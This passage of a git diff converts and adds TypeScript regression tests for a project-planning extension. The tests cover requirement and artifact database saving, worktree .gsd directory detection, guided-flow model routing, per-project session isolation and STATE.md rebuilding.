-        slice_id: 'S01',
-      },
-      tmpDir,
-    );
+      // Verify REQUIREMENTS.md was generated
+      const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
+      assert.ok(fs.existsSync(mdPath), 'REQUIREMENTS.md should be created');
+      const mdContent = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(mdContent.includes('R001'), 'REQUIREMENTS.md should contain R001');
+      assert.ok(mdContent.includes('validated'), 'REQUIREMENTS.md should reflect updated status');
 
-    // Verify artifact in DB
-    const adapter = _getAdapter();
-    assertTrue(adapter !== null, 'Adapter should be available');
-    const rows = adapter!.prepare(
-      "SELECT * FROM artifacts WHERE path = 'milestones/M001/slices/S01/S01-SUMMARY.md'",
-    ).all();
-    assertEq(rows.length, 1, 'Should have 1 artifact row');
-    assertEq(rows[0]['artifact_type'] as string, 'SUMMARY', 'Artifact type should be SUMMARY');
-    assertEq(rows[0]['milestone_id'] as string, 'M001', 'Milestone ID should match');
-    assertEq(rows[0]['slice_id'] as string, 'S01', 'Slice ID should match');
+      // Updating non-existent requirement upserts (creates it) — see #2919
+      await updateRequirementInDb('R999', { status: 'deferred' }, tmpDir);
+      const upserted = getRequirementById('R999');
+      assert.ok(upserted !== null, 'R999 should be created by upsert');
+      assert.deepStrictEqual(upserted!.status, 'deferred', 'Upserted requirement should have the updated status');
 
-    // Verify file was written to disk
-    const filePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-SUMMARY.md');
-    assertTrue(fs.existsSync(filePath), 'Summary file should be written to disk');
-    const fileContent = fs.readFileSync(filePath, 'utf-8');
-    assertTrue(fileContent.includes('S01 Summary'), 'File should contain summary content');
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
 
-    // Test milestone-level artifact (no slice_id)
-    await saveArtifactToDb(
-      {
-        path: 'milestones/M001/M001-CONTEXT.md',
-        artifact_type: 'CONTEXT',
-        content: '# M001 Context\n\nContext notes.',
-        milestone_id: 'M001',
-      },
-      tmpDir,
-    );
+  test('gsd_summary_save', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
 
-    const mFilePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md');
-    assertTrue(fs.existsSync(mFilePath), 'Milestone-level artifact file should be created');
+      // (c) Summary tool creates artifact row
+      await saveArtifactToDb(
+        {
+          path: 'milestones/M001/slices/S01/S01-SUMMARY.md',
+          artifact_type: 'SUMMARY',
+          content: '# S01 Summary\n\nThis is a test summary.',
+          milestone_id: 'M001',
+          slice_id: 'S01',
+        },
+        tmpDir,
+      );
 
-    // Test task-level artifact
-    await saveArtifactToDb(
-      {
-        path: 'milestones/M001/slices/S01/tasks/T01-SUMMARY.md',
-        artifact_type: 'SUMMARY',
-        content: '# T01 Summary\n\nTask summary.',
-        milestone_id: 'M001',
-        slice_id: 'S01',
-        task_id: 'T01',
-      },
-      tmpDir,
-    );
+      // Verify artifact in DB
+      const adapter = _getAdapter();
+      assert.ok(adapter !== null, 'Adapter should be available');
+      const rows = adapter!.prepare(
+        "SELECT * FROM artifacts WHERE path = 'milestones/M001/slices/S01/S01-SUMMARY.md'",
+      ).all();
+      assert.deepStrictEqual(rows.length, 1, 'Should have 1 artifact row');
+      assert.deepStrictEqual(rows[0]['artifact_type'] as string, 'SUMMARY', 'Artifact type should be SUMMARY');
+      assert.deepStrictEqual(rows[0]['milestone_id'] as string, 'M001', 'Milestone ID should match');
+      assert.deepStrictEqual(rows[0]['slice_id'] as string, 'S01', 'Slice ID should match');
 
-    const tFilePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks', 'T01-SUMMARY.md');
-    assertTrue(fs.existsSync(tFilePath), 'Task-level artifact file should be created');
+      // Verify file was written to disk
+      const filePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-SUMMARY.md');
+      assert.ok(fs.existsSync(filePath), 'Summary file should be written to disk');
+      const fileContent = fs.readFileSync(filePath, 'utf-8');
+      assert.ok(fileContent.includes('S01 Summary'), 'File should contain summary content');
 
-    closeDatabase();
-  } finally {
-    cleanupDir(tmpDir);
-  }
-}
+      // Test milestone-level artifact (no slice_id)
+      await saveArtifactToDb(
+        {
+          path: 'milestones/M001/M001-CONTEXT.md',
+          artifact_type: 'CONTEXT',
+          content: '# M001 Context\n\nContext notes.',
+          milestone_id: 'M001',
+        },
+        tmpDir,
+      );
 
-// ═══════════════════════════════════════════════════════════════════════════
-// DB unavailable error paths
-// ═══════════════════════════════════════════════════════════════════════════
+      const mFilePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md');
+      assert.ok(fs.existsSync(mFilePath), 'Milestone-level artifact file should be created');
 
-console.log('\n── DB unavailable error paths ──');
+      // Test task-level artifact
+      await saveArtifactToDb(
+        {
+          path: 'milestones/M001/slices/S01/tasks/T01-SUMMARY.md',
+          artifact_type: 'SUMMARY',
+          content: '# T01 Summary\n\nTask summary.',
+          milestone_id: 'M001',
+          slice_id: 'S01',
+          task_id: 'T01',
+        },
+        tmpDir,
+      );
 
-{
-  // (d) All tools return isError when DB unavailable
-  // Close any open DB and don't open a new one
-  try { closeDatabase(); } catch { /* already closed */ }
+      const tFilePath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks', 'T01-SUMMARY.md');
+      assert.ok(fs.existsSync(tFilePath), 'Task-level artifact file should be created');
 
-  // isDbAvailable() should return false
-  assertTrue(!isDbAvailable(), 'DB should be unavailable after close');
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
 
-  // nextDecisionId degrades gracefully
-  const fallbackId = await nextDecisionId();
-  assertEq(fallbackId, 'D001', 'nextDecisionId should return D001 when DB unavailable');
-}
+  test('gsd_summary_save supports CONTEXT-DRAFT persistence', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Tool result format verification
-// ═══════════════════════════════════════════════════════════════════════════
+      await saveArtifactToDb(
+        {
+          path: 'milestones/M001/M001-CONTEXT-DRAFT.md',
+          artifact_type: 'CONTEXT-DRAFT',
+          content: '# M001 Draft Context\n\nDraft notes.',
+          milestone_id: 'M001',
+        },
+        tmpDir,
+      );
 
-console.log('\n── Tool result format ──');
+      const draftPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-CONTEXT-DRAFT.md');
+      assert.ok(fs.existsSync(draftPath), 'Draft context file should be created');
+      const draftContent = fs.readFileSync(draftPath, 'utf-8');
+      assert.ok(draftContent.includes('Draft Context'), 'Draft context file should contain draft content');
 
-{
-  const tmpDir = makeTmpDir();
-  try {
-    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-    openDatabase(dbPath);
+      const adapter = _getAdapter();
+      assert.ok(adapter !== null, 'Adapter should be available');
+      const rows = adapter!.prepare(
+        "SELECT * FROM artifacts WHERE path = 'milestones/M001/M001-CONTEXT-DRAFT.md'",
+      ).all();
+      assert.deepStrictEqual(rows.length, 1, 'Should have 1 draft artifact row');
+      assert.deepStrictEqual(rows[0]['artifact_type'] as string, 'CONTEXT-DRAFT', 'Artifact type should be CONTEXT-DRAFT');
 
-    // Verify result follows AgentToolResult interface: {content: [{type: "text", text}], details}
-    const result = await saveDecisionToDb(
-      {
-        scope: 'format-test',
-        decision: 'Test format',
-        choice: 'TypeBox',
-        rationale: 'Schema validation',
-      },
-      tmpDir,
-    );
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
 
-    // The saveDecisionToDb returns {id} — the tool wrapping adds the AgentToolResult shape.
-    // Verify the raw function returns the expected shape.
-    assertTrue(typeof result.id === 'string', 'saveDecisionToDb should return {id: string}');
-    assertMatch(result.id, /^D\d{3}$/, 'ID should match DXXX pattern');
+  test('DB unavailable error paths', async () => {
+    // (d) All tools return isError when DB unavailable
+    // Close any open DB and don't open a new one
+    try { closeDatabase(); } catch { /* already closed */ }
 
-    closeDatabase();
-  } finally {
-    cleanupDir(tmpDir);
-  }
-}
+    // isDbAvailable() should return false
+    assert.ok(!isDbAvailable(), 'DB should be unavailable after close');
 
-// ═══════════════════════════════════════════════════════════════════════════
+    // nextDecisionId degrades gracefully
+    const fallbackId = await nextDecisionId();
+    assert.deepStrictEqual(fallbackId, 'D001', 'nextDecisionId should return D001 when DB unavailable');
+  });
 
-report();
+  test('gsd_requirement_save creates new requirement', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
+
+      // (a) saveRequirementToDb creates a new requirement with auto-assigned ID
+      const result = await saveRequirementToDb(
+        {
+          class: 'functional',
+          status: 'active',
+          description: 'Must support dark mode',
+          why: 'Accessibility requirement',
+          source: 'user-research',
+        },
+        tmpDir,
+      );
+
+      assert.deepStrictEqual(result.id, 'R001', 'First requirement should be R001');
+
+      // Verify DB row exists
+      const row = getRequirementById('R001');
+      assert.ok(row !== null, 'Requirement R001 should exist in DB');
+      assert.deepStrictEqual(row!.class, 'functional', 'Class should match');
+      assert.deepStrictEqual(row!.description, 'Must support dark mode', 'Description should match');
+      assert.deepStrictEqual(row!.status, 'active', 'Status should match');
+
+      // Verify REQUIREMENTS.md was generated
+      const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
+      assert.ok(fs.existsSync(mdPath), 'REQUIREMENTS.md should be created');
+      const mdContent = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(mdContent.includes('R001'), 'REQUIREMENTS.md should contain R001');
+      assert.ok(mdContent.includes('dark mode'), 'REQUIREMENTS.md should contain description');
+
+      // (b) Auto-assigns correct next ID
+      const result2 = await saveRequirementToDb(
+        {
+          class: 'non-functional',
+          status: 'active',
+          description: 'Must load in under 2 seconds',
+          why: 'Performance SLA',
+          source: 'design',
+        },
+        tmpDir,
+      );
+      assert.deepStrictEqual(result2.id, 'R002', 'Second requirement should be R002');
+
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('nextRequirementId computes correct next ID', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
+
+      // No requirements yet
+      const id1 = await nextRequirementId();
+      assert.deepStrictEqual(id1, 'R001', 'Should return R001 when no requirements exist');
+
+      // Add one requirement
+      upsertRequirement({
+        id: 'R001',
+        class: 'functional',
+        status: 'active',
+        description: 'Test',
+        why: '',
+        source: '',
+        primary_owner: '',
+        supporting_slices: '',
+        validation: '',
+        notes: '',
+        full_content: '',
+        superseded_by: null,
+      });
+
+      const id2 = await nextRequirementId();
+      assert.deepStrictEqual(id2, 'R002', 'Should return R002 after R001 exists');
+
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('gsd_requirement_update upserts when requirement not in DB', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
+
+      // Requirement R025 does NOT exist in DB — simulates the bug scenario
+      // where requirements exist in REQUIREMENTS.md but were never imported.
+      // updateRequirementInDb should create the row instead of throwing.
+      await updateRequirementInDb(
+        'R025',
+        { status: 'validated', validation: 'Integration tests pass' },
+        tmpDir,
+      );
+
+      const created = getRequirementById('R025');
+      assert.ok(created !== null, 'R025 should be created by upsert');
+      assert.deepStrictEqual(created!.status, 'validated', 'Status should be set');
+      assert.deepStrictEqual(created!.validation, 'Integration tests pass', 'Validation should be set');
+
+      // Verify REQUIREMENTS.md was generated
+      const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
+      assert.ok(fs.existsSync(mdPath), 'REQUIREMENTS.md should be created');
+
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('Tool result format', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
+
+      // Verify result follows AgentToolResult interface: {content: [{type: "text", text}], details}
+      const result = await saveDecisionToDb(
+        {
+          scope: 'format-test',
+          decision: 'Test format',
+          choice: 'TypeBox',
+          rationale: 'Schema validation',
+        },
+        tmpDir,
+      );
+
+      // The saveDecisionToDb returns {id} - the tool wrapping adds the AgentToolResult shape.
+      // Verify the raw function returns the expected shape.
+      assert.ok(typeof result.id === 'string', 'saveDecisionToDb should return {id: string}');
+      assert.match(result.id, /^D\d{3}$/, 'ID should match DXXX pattern');
+
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gsdroot-worktree-detection.test.ts b/src/resources/extensions/gsd/tests/gsdroot-worktree-detection.test.ts
new file mode 100644
index 000000000..542702f2e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/gsdroot-worktree-detection.test.ts
@@ -0,0 +1,164 @@
+/**
+ * gsdroot-worktree-detection.test.ts — Regression test for #2594.
+ *
+ * gsdRoot() must return the worktree's own .gsd directory when the basePath
+ * is inside a .gsd/worktrees/<name>/ structure, not walk up to the project
+ * root's .gsd via the git-root probe.
+ *
+ * The bug: when a git worktree lives at /project/.gsd/worktrees/M008/,
+ * probeGsdRoot() runs `git rev-parse --show-toplevel` which can return the
+ * main project root (not the worktree root) depending on git version and
+ * worktree setup. The walk-up then finds /project/.gsd and returns that
+ * instead of the worktree's own .gsd path.
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { mkdtempSync, realpathSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { spawnSync } from "node:child_process";
+
+import { gsdRoot, _clearGsdRootCache } from "../paths.ts";
+
+describe("gsdRoot() worktree detection (#2594)", () => {
+  let projectRoot: string;
+  let projectGsd: string;
+
+  beforeEach(() => {
+    _clearGsdRootCache();
+    // Create a temporary project with a git repo to simulate real conditions.
+    // realpathSync handles macOS /tmp -> /private/tmp.
+    projectRoot = realpathSync(mkdtempSync(join(tmpdir(), "gsdroot-wt-")));
+    projectGsd = join(projectRoot, ".gsd");
+    mkdirSync(projectGsd, { recursive: true });
+
+    // Initialize a git repo in the project root so git rev-parse works
+    spawnSync("git", ["init", "--initial-branch=main"], {
+      cwd: projectRoot,
+      stdio: "ignore",
+    });
+    spawnSync("git", ["config", "user.email", "test@test.com"], {
+      cwd: projectRoot,
+      stdio: "ignore",
+    });
+    spawnSync("git", ["config", "user.name", "Test"], {
+      cwd: projectRoot,
+      stdio: "ignore",
+    });
+    // Create an initial commit so we have a HEAD
+    writeFileSync(join(projectRoot, "README.md"), "# Test");
+    spawnSync("git", ["add", "."], { cwd: projectRoot, stdio: "ignore" });
+    spawnSync("git", ["commit", "-m", "init"], {
+      cwd: projectRoot,
+      stdio: "ignore",
+    });
+  });
+
+  afterEach(() => {
+    _clearGsdRootCache();
+    rmSync(projectRoot, { recursive: true, force: true });
+  });
+
+  test("returns worktree .gsd when basePath is a worktree with its own .gsd (fast path)", () => {
+    // Simulates a worktree that already had copyPlanningArtifacts() run,
+    // so it has its own .gsd/ directory.
+    const worktreeBase = join(projectGsd, "worktrees", "M008");
+    const worktreeGsd = join(worktreeBase, ".gsd");
+    mkdirSync(worktreeGsd, { recursive: true });
+
+    const result = gsdRoot(worktreeBase);
+    assert.equal(
+      result,
+      worktreeGsd,
+      `Expected worktree .gsd (${worktreeGsd}), got ${result}. ` +
+        "gsdRoot() should use the fast path for an existing worktree .gsd.",
+    );
+  });
+
+  test("returns worktree .gsd path (not project root .gsd) when worktree .gsd does not exist yet", () => {
+    // This is the core #2594 bug: the worktree directory exists but its .gsd
+    // subdirectory hasn't been created yet. Without the fix, probeGsdRoot()
+    // walks up from the worktree path, finds /project/.gsd, and returns it.
+    // With the fix, it detects the .gsd/worktrees/<name>/ pattern and returns
+    // the worktree-local .gsd path as the creation fallback.
+    const worktreeBase = join(projectGsd, "worktrees", "M008");
+    mkdirSync(worktreeBase, { recursive: true });
+    // NOTE: no .gsd/ inside worktreeBase
+
+    const result = gsdRoot(worktreeBase);
+    const expected = join(worktreeBase, ".gsd");
+
+    // Without the fix, this returns projectGsd (/project/.gsd) because the
+    // walk-up from worktreeBase finds it. With the fix, it returns the
+    // worktree-local path.
+    assert.notEqual(
+      result,
+      projectGsd,
+      "gsdRoot() must NOT return the project root .gsd when basePath is inside .gsd/worktrees/",
+    );
+    assert.equal(
+      result,
+      expected,
+      `Expected worktree-local .gsd (${expected}), got ${result}.`,
+    );
+  });
+
+  test("returns worktree .gsd when basePath is a real git worktree inside .gsd/worktrees/", () => {
+    // Create a real git worktree at .gsd/worktrees/M010
+    const worktreeName = "M010";
+    const worktreeBase = join(projectGsd, "worktrees", worktreeName);
+
+    // Use git worktree add to create a real worktree
+    const result = spawnSync(
+      "git",
+      ["worktree", "add", "-b", `milestone/${worktreeName}`, worktreeBase],
+      { cwd: projectRoot, encoding: "utf-8" },
+    );
+
+    if (result.status !== 0) {
+      // If git worktree add fails, skip the test gracefully
+      assert.ok(true, "Skipped: git worktree add not available");
+      return;
+    }
+
+    // The real git worktree exists at worktreeBase but has NO .gsd/ subdir yet
+    const gsdResult = gsdRoot(worktreeBase);
+    const expected = join(worktreeBase, ".gsd");
+
+    assert.notEqual(
+      gsdResult,
+      projectGsd,
+      "gsdRoot() must NOT escape to project root .gsd from inside a git worktree",
+    );
+    assert.equal(
+      gsdResult,
+      expected,
+      `Expected worktree-local .gsd (${expected}), got ${gsdResult}`,
+    );
+
+    // Cleanup worktree
+    spawnSync("git", ["worktree", "remove", "--force", worktreeBase], {
+      cwd: projectRoot,
+      stdio: "ignore",
+    });
+  });
+
+  test("still returns project .gsd for normal (non-worktree) basePath", () => {
+    const result = gsdRoot(projectRoot);
+    assert.equal(result, projectGsd);
+  });
+
+  test("still returns project .gsd for a subdirectory of the project", () => {
+    const subdir = join(projectRoot, "src", "lib");
+    mkdirSync(subdir, { recursive: true });
+
+    const result = gsdRoot(subdir);
+    assert.equal(
+      result,
+      projectGsd,
+      "Non-worktree subdirectories should still resolve to project .gsd",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/guided-flow-dynamic-routing.test.ts b/src/resources/extensions/gsd/tests/guided-flow-dynamic-routing.test.ts
new file mode 100644
index 000000000..d9b135426
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/guided-flow-dynamic-routing.test.ts
@@ -0,0 +1,135 @@
+/**
+ * Guided-flow dynamic routing — regression test for #2958.
+ *
+ * Verifies that dispatchWorkflow() routes through the dynamic routing pipeline
+ * (selectAndApplyModel from auto-model-selection.ts) instead of bypassing it
+ * with a direct call to resolveModelWithFallbacksForUnit.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+function readSrc(file: string): string {
+  return readFileSync(join(gsdDir, file), "utf-8");
+}
+
+const guidedFlowSrc = readSrc("guided-flow.ts");
+
+// ═══════════════════════════════════════════════════════════════════════════
+// #2958: dispatchWorkflow must route through dynamic routing pipeline
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("#2958: guided-flow imports selectAndApplyModel from auto-model-selection", () => {
+  assert.ok(
+    guidedFlowSrc.includes("selectAndApplyModel"),
+    "guided-flow.ts must import and use selectAndApplyModel from auto-model-selection.ts",
+  );
+});
+
+test("#2958: dispatchWorkflow does not call resolveModelWithFallbacksForUnit directly", () => {
+  // Extract the dispatchWorkflow function body
+  const fnStart = guidedFlowSrc.indexOf("async function dispatchWorkflow(");
+  assert.ok(fnStart !== -1, "dispatchWorkflow function not found");
+
+  // Find the function body by tracking brace depth
+  const openBrace = guidedFlowSrc.indexOf("{", fnStart);
+  let depth = 1;
+  let pos = openBrace + 1;
+  while (depth > 0 && pos < guidedFlowSrc.length) {
+    if (guidedFlowSrc[pos] === "{") depth++;
+    else if (guidedFlowSrc[pos] === "}") depth--;
+    pos++;
+  }
+  const fnBody = guidedFlowSrc.slice(openBrace, pos);
+
+  assert.ok(
+    !fnBody.includes("resolveModelWithFallbacksForUnit"),
+    "dispatchWorkflow must NOT call resolveModelWithFallbacksForUnit directly — " +
+    "it must route through selectAndApplyModel for dynamic routing support (#2958)",
+  );
+});
+
+test("#2958: dispatchWorkflow calls selectAndApplyModel for model selection", () => {
+  // Extract the dispatchWorkflow function body
+  const fnStart = guidedFlowSrc.indexOf("async function dispatchWorkflow(");
+  assert.ok(fnStart !== -1, "dispatchWorkflow function not found");
+
+  const openBrace = guidedFlowSrc.indexOf("{", fnStart);
+  let depth = 1;
+  let pos = openBrace + 1;
+  while (depth > 0 && pos < guidedFlowSrc.length) {
+    if (guidedFlowSrc[pos] === "{") depth++;
+    else if (guidedFlowSrc[pos] === "}") depth--;
+    pos++;
+  }
+  const fnBody = guidedFlowSrc.slice(openBrace, pos);
+
+  assert.ok(
+    fnBody.includes("selectAndApplyModel"),
+    "dispatchWorkflow must call selectAndApplyModel to route through the dynamic routing pipeline (#2958)",
+  );
+});
+
+test("#2958: dispatchWorkflow does not use resolveAvailableModel inline", () => {
+  const fnStart = guidedFlowSrc.indexOf("async function dispatchWorkflow(");
+  assert.ok(fnStart !== -1, "dispatchWorkflow function not found");
+
+  const openBrace = guidedFlowSrc.indexOf("{", fnStart);
+  let depth = 1;
+  let pos = openBrace + 1;
+  while (depth > 0 && pos < guidedFlowSrc.length) {
+    if (guidedFlowSrc[pos] === "{") depth++;
+    else if (guidedFlowSrc[pos] === "}") depth--;
+    pos++;
+  }
+  const fnBody = guidedFlowSrc.slice(openBrace, pos);
+
+  assert.ok(
+    !fnBody.includes("resolveAvailableModel"),
+    "dispatchWorkflow must NOT use resolveAvailableModel inline — " +
+    "model resolution is handled by selectAndApplyModel (#2958)",
+  );
+});
+
+test("#2958: guided-flow does not import resolveModelWithFallbacksForUnit", () => {
+  // The import should be removed since dispatchWorkflow was the only consumer
+  // Check if resolveModelWithFallbacksForUnit is still used elsewhere in the file
+  const fnStart = guidedFlowSrc.indexOf("async function dispatchWorkflow(");
+  const beforeDispatch = guidedFlowSrc.slice(0, fnStart);
+  const afterFnEnd = (() => {
+    const openBrace = guidedFlowSrc.indexOf("{", fnStart);
+    let depth = 1;
+    let p = openBrace + 1;
+    while (depth > 0 && p < guidedFlowSrc.length) {
+      if (guidedFlowSrc[p] === "{") depth++;
+      else if (guidedFlowSrc[p] === "}") depth--;
+      p++;
+    }
+    return guidedFlowSrc.slice(p);
+  })();
+
+  // If resolveModelWithFallbacksForUnit is not used outside dispatchWorkflow,
+  // the import should be removed
+  const usedOutside = beforeDispatch.includes("resolveModelWithFallbacksForUnit(")
+    || afterFnEnd.includes("resolveModelWithFallbacksForUnit(");
+
+  if (!usedOutside) {
+    // Verify the import line was cleaned up
+    const importLines = guidedFlowSrc.split("\n").filter(l =>
+      l.includes("import") && l.includes("resolveModelWithFallbacksForUnit"),
+    );
+    assert.equal(
+      importLines.length,
+      0,
+      "resolveModelWithFallbacksForUnit import should be removed when no longer used outside dispatchWorkflow",
+    );
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/guided-flow-session-isolation.test.ts b/src/resources/extensions/gsd/tests/guided-flow-session-isolation.test.ts
new file mode 100644
index 000000000..c104b2d22
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/guided-flow-session-isolation.test.ts
@@ -0,0 +1,131 @@
+/**
+ * Regression test for #2985 Bugs 3 & 4:
+ *   Bug 3 — module-level pendingAutoStart singleton clobbers concurrent sessions.
+ *   Bug 4 — getDiscussionMilestoneId() returns wrong project's milestone under concurrency.
+ *
+ * pendingAutoStart must be keyed by basePath so concurrent discuss sessions
+ * in different projects are independent.  getDiscussionMilestoneId() must accept
+ * a basePath parameter to perform a keyed lookup.
+ */
+
+import { describe, test, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  getDiscussionMilestoneId,
+  setPendingAutoStart,
+  clearPendingAutoStart,
+  checkAutoStartAfterDiscuss,
+} from "../guided-flow.ts";
+
+// ─── Tests ─────────────────────────────────────────────────────────────────
+
+describe("#2985 Bug 3 — concurrent discuss sessions must be independent", () => {
+  beforeEach(() => {
+    clearPendingAutoStart();
+  });
+
+  test("second session does not clobber first session's pending auto-start", () => {
+    // Simulate two concurrent discuss sessions for different projects
+    const projectA = "/projects/alpha";
+    const projectB = "/projects/beta";
+
+    setPendingAutoStart(projectA, {
+      basePath: projectA,
+      milestoneId: "M001-aaa111",
+    });
+
+    setPendingAutoStart(projectB, {
+      basePath: projectB,
+      milestoneId: "M002-bbb222",
+    });
+
+    // Both sessions should be retrievable
+    const milestoneA = getDiscussionMilestoneId(projectA);
+    const milestoneB = getDiscussionMilestoneId(projectB);
+
+    assert.equal(milestoneA, "M001-aaa111", "projectA's milestone should be preserved");
+    assert.equal(milestoneB, "M002-bbb222", "projectB's milestone should be preserved");
+  });
+
+  test("clearing one session does not affect the other", () => {
+    const projectA = "/projects/alpha";
+    const projectB = "/projects/beta";
+
+    setPendingAutoStart(projectA, { basePath: projectA, milestoneId: "M001-aaa111" });
+    setPendingAutoStart(projectB, { basePath: projectB, milestoneId: "M002-bbb222" });
+
+    // Clear only projectA
+    clearPendingAutoStart(projectA);
+
+    assert.equal(getDiscussionMilestoneId(projectA), null, "projectA should be cleared");
+    assert.equal(getDiscussionMilestoneId(projectB), "M002-bbb222", "projectB should survive");
+  });
+});
+
+describe("#2985 Bug 4 — getDiscussionMilestoneId must be keyed by basePath", () => {
+  beforeEach(() => {
+    clearPendingAutoStart();
+  });
+
+  test("getDiscussionMilestoneId(basePath) returns correct milestone for each project", () => {
+    setPendingAutoStart("/proj/a", { basePath: "/proj/a", milestoneId: "M001" });
+    setPendingAutoStart("/proj/b", { basePath: "/proj/b", milestoneId: "M002" });
+
+    assert.equal(getDiscussionMilestoneId("/proj/a"), "M001");
+    assert.equal(getDiscussionMilestoneId("/proj/b"), "M002");
+    assert.equal(getDiscussionMilestoneId("/proj/unknown"), null);
+  });
+
+  test("getDiscussionMilestoneId() without basePath returns null when multiple sessions exist", () => {
+    setPendingAutoStart("/proj/a", { basePath: "/proj/a", milestoneId: "M001" });
+    setPendingAutoStart("/proj/b", { basePath: "/proj/b", milestoneId: "M002" });
+
+    // Without a key, the function should not blindly return the first entry
+    const result = getDiscussionMilestoneId();
+    // When there's ambiguity (multiple sessions), it should return null
+    // to force callers to be explicit
+    assert.equal(result, null, "should not return arbitrary milestone when multiple sessions exist");
+  });
+
+  test("getDiscussionMilestoneId() without basePath returns the milestone when only one session", () => {
+    setPendingAutoStart("/proj/a", { basePath: "/proj/a", milestoneId: "M001" });
+
+    // With only one session, backward compat — return it
+    const result = getDiscussionMilestoneId();
+    assert.equal(result, "M001", "should return the only active milestone for backward compat");
+  });
+});
+
+test("checkAutoStartAfterDiscuss fails closed when a multi-milestone manifest is missing", () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-auto-start-manifest-"));
+  try {
+    const gsdDir = join(base, ".gsd");
+    const milestoneDir = join(gsdDir, "milestones", "M001");
+    mkdirSync(milestoneDir, { recursive: true });
+    mkdirSync(join(gsdDir, "milestones", "M002"), { recursive: true });
+    writeFileSync(
+      join(gsdDir, "PROJECT.md"),
+      `# Project\n\n| M001 | First milestone | active |\n| M002 | Second milestone | queued |\n`,
+    );
+    writeFileSync(join(gsdDir, "STATE.md"), "# State\n");
+    writeFileSync(join(milestoneDir, "M001-CONTEXT.md"), "# M001 Context\n");
+
+    clearPendingAutoStart();
+    setPendingAutoStart(base, {
+      basePath: base,
+      milestoneId: "M001",
+      ctx: { ui: { notify: () => undefined } } as any,
+      pi: { setActiveTools: () => undefined, getActiveTools: () => [] } as any,
+    });
+
+    const started = checkAutoStartAfterDiscuss();
+    assert.equal(started, false, "auto-start should fail closed without the manifest");
+  } finally {
+    clearPendingAutoStart();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/guided-flow-state-rebuild.test.ts b/src/resources/extensions/gsd/tests/guided-flow-state-rebuild.test.ts
new file mode 100644
index 000000000..b2506dab5
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/guided-flow-state-rebuild.test.ts
@@ -0,0 +1,103 @@
+/**
+ * Regression test for #3475: guided-flow must rebuild STATE.md from derived
+ * state before dispatching workflows.
+ *
+ * Verifies that buildStateMarkdown() produces content matching the derived
+ * state (not a stale on-disk cache), and that the rebuild helper is wired
+ * correctly from doctor.ts.
+ */
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveState, invalidateStateCache } from "../state.ts";
+import { buildStateMarkdown, rebuildState } from "../doctor.ts";
+import { resolveGsdRootFile } from "../paths.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../gsd-db.ts";
+
+function createFixtureBase(): string {
